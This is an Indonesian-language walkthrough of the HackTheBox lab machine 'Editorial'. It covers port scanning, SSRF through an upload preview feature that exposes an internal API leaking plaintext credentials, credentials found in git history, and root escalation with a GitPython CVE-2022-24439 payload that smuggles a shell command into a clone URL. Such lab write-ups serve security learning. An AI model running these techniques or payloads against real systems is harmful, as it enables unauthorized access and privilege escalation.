Editorial – HackTheBox Writeup

Posted on by joelindra

Halo semua! Kembali lagi bersama saya, kali ini saya akan membahas mesin HackTheBox bernama “Editorial”. Mari kita pelajari bersama bagaimana cara mendapatkan akses user dan root pada mesin ini.

Reconnaissance

Seperti biasa, langkah pertama adalah melakukan reconnaissance pada target menggunakan Nmap:

nmap -sSCV -O -A 10.10.11.20 -T5

Hasil scan:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-22 09:37 EST
Nmap scan report for 10.10.11.20
Host is up (0.26s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 0d:ed:b2:9c:e2:53:fb:d4:c8:c1:19:6e:75:80:d8:64 (ECDSA)
|_  256 0f:b9:a7:51:0e:00:d5:7b:5b:7c:5f:bf:2b:ed:53:a0 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editorial.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)

Enumerasi Web

Berdasarkan hasil scan, web server melakukan redirect ke http://editorial.htb. Perlu menambahkan hostname ini ke file /etc/hosts.

Ketika menjelajahi website, saya menemukan beberapa alamat email di halaman “About”. Hal ini bisa berguna untuk username di tahap selanjutnya.

Exploit – SSRF pada Fitur Upload

Di menu “Publish with Us”, terdapat form upload file dengan beberapa kolom isian. Yang menarik adalah fitur “Preview” yang mengirimkan request ke server.

Saat mencoba melakukan SSRF (Server-Side Request Forgery) dengan mengarahkan request ke IP saya sendiri:

nc -lvnp 1334

Hasilnya:

listening on [any] 1334 ...
connect to [10.10.14.67] from (UNKNOWN) [10.10.11.20] 40922
GET / HTTP/1.1
Host: 10.10.14.67:1334
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

Port Fuzzing & API Discovery

Setelah mencoba beberapa internal IP dengan berbagai port, saya menemukan respon berbeda pada port 5000. Dengan menggunakan fitur browser dan membuka gambar di tab baru, file tersebut otomatis terdownload.

Isi file tersebut (setelah diproses dengan jq):

{
  "messages": [
    {
      "promotions": {
        "description": "Retrieve a list of all the promotions in our library.",
        "endpoint": "/api/latest/metadata/messages/promos",
        "methods": "GET"
      }
    },
    {
      "coupons": {
        "description": "Retrieve the list of coupons to use in our library.",
        "endpoint": "/api/latest/metadata/messages/coupons",
        "methods": "GET"
      }
    },
    {
      "new_authors": {
        "description": "Retrieve the welcome message sended to our new authors.",
        "endpoint": "/api/latest/metadata/messages/authors",
        "methods": "GET"
      }
    },
    {
      "platform_use": {
        "description": "Retrieve examples of how to use the platform.",
        "endpoint": "/api/latest/metadata/messages/how_to_use_platform",
        "methods": "GET"
      }
    }
  ],
  "version": [
    {
      "changelog": {
        "description": "Retrieve a list of all the versions and updates of the api.",
        "endpoint": "/api/latest/metadata/changelog",
        "methods": "GET"
      }
    },
    {
      "latest": {
        "description": "Retrieve the last version of api.",
        "endpoint": "/api/latest/metadata",
        "methods": "GET"
      }
    }
  ]
}

Mendapatkan Kredensial

Setelah melihat endpoint yang berkaitan dengan “authors”, saya fokus ke API tersebut dan mendapatkan informasi berikut:

{
  "template_mail_message": "Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: dev\nPassword: dev080217_devAPI!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, Editorial Tiempo Arriba Team."                                                                                                                                                                                                          
}

User Access

Dengan kredensial tersebut, saya berhasil login melalui SSH:

ssh dev@10.10.11.20

Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-112-generic x86_64)
...
dev@editorial:~$ whoami
dev
dev@editorial:~$ ls
apps  user.txt
dev@editorial:~$ cat user.txt 
46de1ee298c9f3...............

Privilege Escalation

Setelah masuk sebagai user dev,

saya menemukan folder apps dengan repositori Git di dalamnya:

dev@editorial:~/apps$ ls -la
total 12
drwxrwxr-x 3 dev dev 4096 Jun  5  2024 .
drwxr-x--- 6 dev dev 4096 Dec 22 15:05 ..
drwxr-xr-x 8 dev dev 4096 Jun  5  2024 .git

Dengan memeriksa log Git:

dev@editorial:~/apps$ git log

Saya menemukan commit yang menarik dengan deskripsi “change(api): downgrading prod to dev”. Melihat lebih detail:

dev@editorial:~/apps$ git show b73481bb823d2dfb49c44f4c1e6a7e11912ed8ae

diff --git a/app_api/app.py b/app_api/app.py
index 61b786f..3373b14 100644
--- a/app_api/app.py
+++ b/app_api/app.py
@@ -64,7 +64,7 @@ def index():
 @app.route(api_route + '/authors/message', methods=['GET'])
 def api_mail_new_authors():
     return jsonify({
-        'template_mail_message': "Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: prod\nPassword: 080217_ProductionAPI!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, " + api_editorial_name + " Team."
+        'template_mail_message': "Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: dev\nPassword: dev080217_devAPI!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, " + api_editorial_name + " Team."
     }) # TODO: replace dev credentials when checks pass

Root Access

Dengan kredensial user prod yang ditemukan, saya beralih ke user tersebut dan memeriksa hak sudo:

dev@editorial:~/apps$ su prod
Password: 
prod@editorial:/home/dev/apps$ sudo -l
[sudo] password for prod: 
Matching Defaults entries for prod on editorial:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User prod may run the following commands on editorial:
    (root) /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py *

Memeriksa file Python tersebut:

prod@editorial:/home/dev/apps$ cat /opt/internal_apps/clone_changes/clone_prod_change.py
#!/usr/bin/python3

import os
import sys
from git import Repo

os.chdir('/opt/internal_apps/clone_changes')

url_to_clone = sys.argv[1]

r = Repo.init('', bare=True)
r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])

Eksploitasi GitPython

Setelah investigasi, saya menemukan bahwa sistem menggunakan GitPython 3.1.29 yang rentan terhadap CVE-2022-24439. Saya mengeksploitasi kerentanan ini dengan perintah:

sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c cat% /root/root.txt% >% /tmp/root'

Dengan perintah tersebut, root flag berhasil disalin ke /tmp/root yang dapat dibaca oleh user prod.

Leave a Reply

Your email address will not be published. Required fields are marked *

Related Posts